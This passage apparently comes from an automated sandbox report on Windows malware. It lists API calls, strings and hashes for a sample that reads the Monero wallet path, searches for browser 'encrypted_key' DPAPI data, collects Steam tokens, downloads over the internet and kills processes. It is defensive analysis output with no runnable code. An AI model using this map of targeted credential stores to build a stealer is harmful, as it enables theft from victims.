                              • RtlAllocateHeap.NTDLL(00000000), ref: 0039113C
                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00391159
                              • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00391173
                              • RegCloseKey.ADVAPI32(?), ref: 0039117D
                              Strings
                              • SOFTWARE\monero-project\monero-core, xrefs: 0039114F
                              • wallet_path, xrefs: 0039116D
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                              • API String ID: 3225020163-4244082812
                              • Opcode ID: f732bd9383a1491bbf74d2ff9d0b774c7f78a9c5a3b1031964e2597f883e4b3b
                              • Instruction ID: fcfe0044d8c5aee3840d2ee4a6069c6eb20c3597b629a60ff7ce0a44b6f8d188
                              • Opcode Fuzzy Hash: f732bd9383a1491bbf74d2ff9d0b774c7f78a9c5a3b1031964e2597f883e4b3b
                              • Instruction Fuzzy Hash: E3F03075640309BFD7109BE49C4DFEA7B7CEB14715F100159FE05E2281E6B05A58A7A0
                              APIs
                              • memcmp.MSVCRT(?,v20,00000003), ref: 00399E04
                              • memcmp.MSVCRT(?,v10,00000003), ref: 00399E42
                              • LocalAlloc.KERNEL32(00000040), ref: 00399EA7
                                • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                              • lstrcpy.KERNEL32(00000000,003C4C48), ref: 00399FB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemcmp$AllocLocal
                              • String ID: @$v10$v20
                              • API String ID: 102826412-278772428
                              • Opcode ID: f57e94b33d9114a79e59531b4543c40dd498169c97f4d42a02c31715c6542c77
                              • Instruction ID: 18502321e5b7152c7b6c3ad9fd13f0bdb9de74140305a04567a21dab6ff4e27d
                              • Opcode Fuzzy Hash: f57e94b33d9114a79e59531b4543c40dd498169c97f4d42a02c31715c6542c77
                              • Instruction Fuzzy Hash: 0051B032A11209ABCF12EF68DC85BDEB7A8EF54315F154029F90AEF251DB70ED158B90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0039565A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00395661
                              • InternetOpenA.WININET(003BCFEC,00000000,00000000,00000000,00000000), ref: 00395677
                              • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00395692
                              • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003956BC
                              • memcpy.MSVCRT(00000000,?,00000001), ref: 003956E1
                              • InternetCloseHandle.WININET(?), ref: 003956FA
                              • InternetCloseHandle.WININET(00000000), ref: 00395701
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                              • String ID:
                              • API String ID: 1008454911-0
                              • Opcode ID: 04db98aa8fe2b76d1d4dae00b674b77ba9cb4460117d18d358fe318034cac97e
                              • Instruction ID: 3dfac3ada738dc2fa6e0e1f9b78ebfd7383e7072fa611155aea628f865ae6aad
                              • Opcode Fuzzy Hash: 04db98aa8fe2b76d1d4dae00b674b77ba9cb4460117d18d358fe318034cac97e
                              • Instruction Fuzzy Hash: 3C41A270A00605EFDB16CF95DC88FAAB7B5FF48305F1580A9E908DB290D7719985CF94
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003B4759
                              • Process32First.KERNEL32(00000000,00000128), ref: 003B4769
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B477B
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B479C
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 003B47AB
                              • CloseHandle.KERNEL32(00000000), ref: 003B47B2
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B47C0
                              • CloseHandle.KERNEL32(00000000), ref: 003B47CB
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: 978d51692302a1dc455b9a2700f3312f1f7306c53fcd37be16d0e05a2d74b6f8
                              • Instruction ID: 80dce8281f8c0c6b1710fe96f41c51a0ddaf7cb3a69d45f04ac5b62587822172
                              • Opcode Fuzzy Hash: 978d51692302a1dc455b9a2700f3312f1f7306c53fcd37be16d0e05a2d74b6f8
                              • Instruction Fuzzy Hash: FF01B571601618AFE7215B609C8EFFA77BCEB58755F0101C4FA05E1182EF74CD88DAA4
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 003A8435
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A846C
                              • lstrlen.KERNEL32(00000000), ref: 003A84B2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A84E9
                              • lstrlen.KERNEL32(00000000), ref: 003A84FF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A852E
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A853E
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 5b65aca6765f1a470186c183de73f10767198874a0c00f9caf8ab79bb7801d3c
                              • Instruction ID: 9e78daebb2f9c3587bbf06bd2621c5c8506f4c1f7f44aef7c1c3a1bad38344b6
                              • Opcode Fuzzy Hash: 5b65aca6765f1a470186c183de73f10767198874a0c00f9caf8ab79bb7801d3c
                              • Instruction Fuzzy Hash: C151B1719006069FCB22DF29D884A9BB7F9EF5A700F198469EC46DB245EF34D941CB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2925
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B292C
                              • RegOpenKeyExA.ADVAPI32(80000002,00F1BA70,00000000,00020119,003B28A9), ref: 003B294B
                              • RegQueryValueExA.ADVAPI32(003B28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003B2965
                              • RegCloseKey.ADVAPI32(003B28A9), ref: 003B296F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: a9c279b3da065774ac394528fb2188a1dc9ca156dc4806e796fe50342d24d2de
                              • Instruction ID: 84a6590cc89be4e9f103402c61b40af244c7bf8562db562d11e6d0f5f864fa67
                              • Opcode Fuzzy Hash: a9c279b3da065774ac394528fb2188a1dc9ca156dc4806e796fe50342d24d2de
                              • Instruction Fuzzy Hash: A101BC75600218AFE320CBA09C5DEFB7BBCEB48755F100198FE49EB240EA315A0887A0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2895
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B289C
                                • Part of subcall function 003B2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2925
                                • Part of subcall function 003B2910: RtlAllocateHeap.NTDLL(00000000), ref: 003B292C
                                • Part of subcall function 003B2910: RegOpenKeyExA.ADVAPI32(80000002,00F1BA70,00000000,00020119,003B28A9), ref: 003B294B
                                • Part of subcall function 003B2910: RegQueryValueExA.ADVAPI32(003B28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003B2965
                                • Part of subcall function 003B2910: RegCloseKey.ADVAPI32(003B28A9), ref: 003B296F
                              • RegOpenKeyExA.ADVAPI32(80000002,00F1BA70,00000000,00020119,003A9500), ref: 003B28D1
                              • RegQueryValueExA.ADVAPI32(003A9500,00F2F3B8,00000000,00000000,00000000,000000FF), ref: 003B28EC
                              • RegCloseKey.ADVAPI32(003A9500), ref: 003B28F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 8d6911bee108b0a623dcbda27312e00e8ae6db20ef7529e12d39190f06c86c59
                              • Instruction ID: dff611154c9ce47080dac8172782bffd917045ddbf6d9438263a4ed8ca9c05df
                              • Opcode Fuzzy Hash: 8d6911bee108b0a623dcbda27312e00e8ae6db20ef7529e12d39190f06c86c59
                              • Instruction Fuzzy Hash: C401A275600618BFD7109BA4AC4DFFB777CEB54315F000158FE08D6250DA705D4897A0
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 0039723E
                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00397279
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00397280
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 003972C3
                              • HeapFree.KERNEL32(00000000), ref: 003972CA
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00397329
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                              • String ID:
                              • API String ID: 174687898-0
                              • Opcode ID: cc05d0f3aad4700471f2818eefd742428b5ec1dec81a4952e496cf1c5a724a44
                              • Instruction ID: bbf55472805bd5b947057e529d89d24e1d31f069dbd8af67a2f39449a995826b
                              • Opcode Fuzzy Hash: cc05d0f3aad4700471f2818eefd742428b5ec1dec81a4952e496cf1c5a724a44
                              • Instruction Fuzzy Hash: 81415C757157069BDB21CF69DC84BAAB3E8FB88305F1445A9EC4DC7390E631E900DB90
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 00399CA8
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00399CDA
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00399D03
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2746078483-738592651
                              • Opcode ID: b942fb144ee3cea7c8dc6e8172174d82fea6db2c405217b93cbca539b48c8d43
                              • Instruction ID: 8335f4e43b3a2c931bbceeb90e20788e64352ea1144be138cd3b44ac505ea6e5
                              • Opcode Fuzzy Hash: b942fb144ee3cea7c8dc6e8172174d82fea6db2c405217b93cbca539b48c8d43
                              • Instruction Fuzzy Hash: C441A572A01609ABDF23EF69DC85BEF77B4EF54304F0544A9E915AB262DA30ED04C790
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AEA24
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AEA53
                              • lstrcat.KERNEL32(?,00000000), ref: 003AEA61
                              • lstrcat.KERNEL32(?,003C1794), ref: 003AEA7A
                              • lstrcat.KERNEL32(?,00F288F8), ref: 003AEA8D
                              • lstrcat.KERNEL32(?,003C1794), ref: 003AEA9F
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 360624915c383fe42aef04b9857074acf1d9c75cae1dc9ee398cfd52287f54f1
                              • Instruction ID: 87da215793c507b08a9f704b2dd89bfeffa2278f7cff1920d9c2885a1b47b5ee
                              • Opcode Fuzzy Hash: 360624915c383fe42aef04b9857074acf1d9c75cae1dc9ee398cfd52287f54f1
                              • Instruction Fuzzy Hash: 5E41A772910519AFCB16EB64DC46FFE7378FF58300F0144A8FA169B241DE709E889B94
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AECDF
                              • lstrlen.KERNEL32(00000000), ref: 003AECF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AED1D
                              • lstrlen.KERNEL32(00000000), ref: 003AED24
                              • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 003AED52
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: steam_tokens.txt
                              • API String ID: 367037083-401951677
                              • Opcode ID: 2c88566226158a631e648d7a4b17ee6c5d7a7613d3689c87de0053b216138222
                              • Instruction ID: 9a3e0f93ff94c284dd7cad4c0d1f18228301f7d94ceacf19d6554d0e2df10183
                              • Opcode Fuzzy Hash: 2c88566226158a631e648d7a4b17ee6c5d7a7613d3689c87de0053b216138222
                              • Instruction Fuzzy Hash: B4316F32A129156FCB23BB78EC4AAAF77A8AF51700F055164F846DF212DF20DC2687D5
                              APIs
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0039140E), ref: 00399A9A
                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0039140E), ref: 00399AB0
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,0039140E), ref: 00399AC7
                              • ReadFile.KERNEL32(00000000,00000000,?,0039140E,00000000,?,?,?,0039140E), ref: 00399AE0
                              • LocalFree.KERNEL32(?,?,?,?,0039140E), ref: 00399B00
                              • CloseHandle.KERNEL32(00000000,?,?,?,0039140E), ref: 00399B07
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 46397357f3ed8938189f1a88ca5ec066105567792eb396dd2d060fb126e576e5
                              • Instruction ID: 0227f8edfab55bd8bac1d4df8ce1ce7544827540abfd4eebed7c8f50b97e74e7
                              • Opcode Fuzzy Hash: 46397357f3ed8938189f1a88ca5ec066105567792eb396dd2d060fb126e576e5
                              • Instruction Fuzzy Hash: 8B115B71600609EFEB12DFA9DC88FBB736CEB14340F11025EF901A6280EB749D04CBA0
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 003B5B14
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                              • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 003B5B7C
                              • memmove.MSVCRT(00000000,?,?), ref: 003B5B89
                              • memmove.MSVCRT(00000000,?,?), ref: 003B5B98
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long
                              • API String ID: 2052693487-3788999226
                              • Opcode ID: 44a46d45c6412e6cedd0d318a0604678d0dbf2882390b301ee037a67deffaf7a
                              • Instruction ID: 67e586fdf35cd26a7c587f7ac8fc237173023bf4c5424e11984b0c6894d14b8f
                              • Opcode Fuzzy Hash: 44a46d45c6412e6cedd0d318a0604678d0dbf2882390b301ee037a67deffaf7a
                              • Instruction Fuzzy Hash: 75417171B005199FCF09DF6CC891BAEBBB5EB88314F158229E909EB744D630DD008B90
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 003A7D58
                                • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1D5
                                • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 003A7D76
                              • std::_Xinvalid_argument.LIBCPMT ref: 003A7D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$std::exception::exception
                              • String ID: invalid string position$string too long
                              • API String ID: 3310641104-4289949731
                              • Opcode ID: 9775a9cbe1c00d0c0a944361614f75a9fc1f7c72f332e00711425e7ad53529a4
                              • Instruction ID: a209a38818e28927b9690be950c20e35ecbd40dfba1149db10718ed269952e1d
                              • Opcode Fuzzy Hash: 9775a9cbe1c00d0c0a944361614f75a9fc1f7c72f332e00711425e7ad53529a4
                              • Instruction Fuzzy Hash: BA21E6323146005BD722DE2CDCC1A7AF7E5EFA2710B204A2EE451CB641D770DC008761
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B33EF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B33F6
                              • GlobalMemoryStatusEx.KERNEL32 ref: 003B3411
                              • wsprintfA.USER32 ref: 003B3437
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB
                              • API String ID: 2922868504-2651807785
                              • Opcode ID: 85bd98ef3f2507ada800de031f96f16872b98bf028df4b2b5b48257f01bb373e
                              • Instruction ID: a1dde2ee00bb38d689896e56f4e8e795de4db50d718193a451fffbf9ec68fdaa
                              • Opcode Fuzzy Hash: 85bd98ef3f2507ada800de031f96f16872b98bf028df4b2b5b48257f01bb373e
                              • Instruction Fuzzy Hash: 2701B5B1E44614AFDB05DF98DC49FAEB7B8FB44714F000529FA06E7780DB74590086A5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit$__getptdfree
                              • String ID: Xu<$Xu<
                              • API String ID: 2640026729-2192574222
                              • Opcode ID: cdb0b2a3ff4b8a5edea001e603b1ef672da13c4df7968e8df92baf72b1601337
                              • Instruction ID: 1d5522d17a0287e17623a463954fdf68596e12453a49f653e6032b2ef9fa9e9a
                              • Opcode Fuzzy Hash: cdb0b2a3ff4b8a5edea001e603b1ef672da13c4df7968e8df92baf72b1601337
                              • Instruction Fuzzy Hash: 8C019632D05715A7D713AB699406BDDB3A4AF4171CF16041AEB04AFD90CB347D41CBD5
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00F2E3D8,00000000,00020119,?), ref: 003AD7F5
                              • RegQueryValueExA.ADVAPI32(?,00F2F580,00000000,00000000,00000000,000000FF), ref: 003AD819
                              • RegCloseKey.ADVAPI32(?), ref: 003AD823
                              • lstrcat.KERNEL32(?,00000000), ref: 003AD848
                              • lstrcat.KERNEL32(?,00F2F478), ref: 003AD85C
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: f5a74417368c6130bcb5088123d4032e91e655c62b791c69522bddf576b06dac
                              • Instruction ID: 93812d1fe6561a3342f5484b36c7f73425ab0324c0c4cc07d4f47cebd2e93e8f
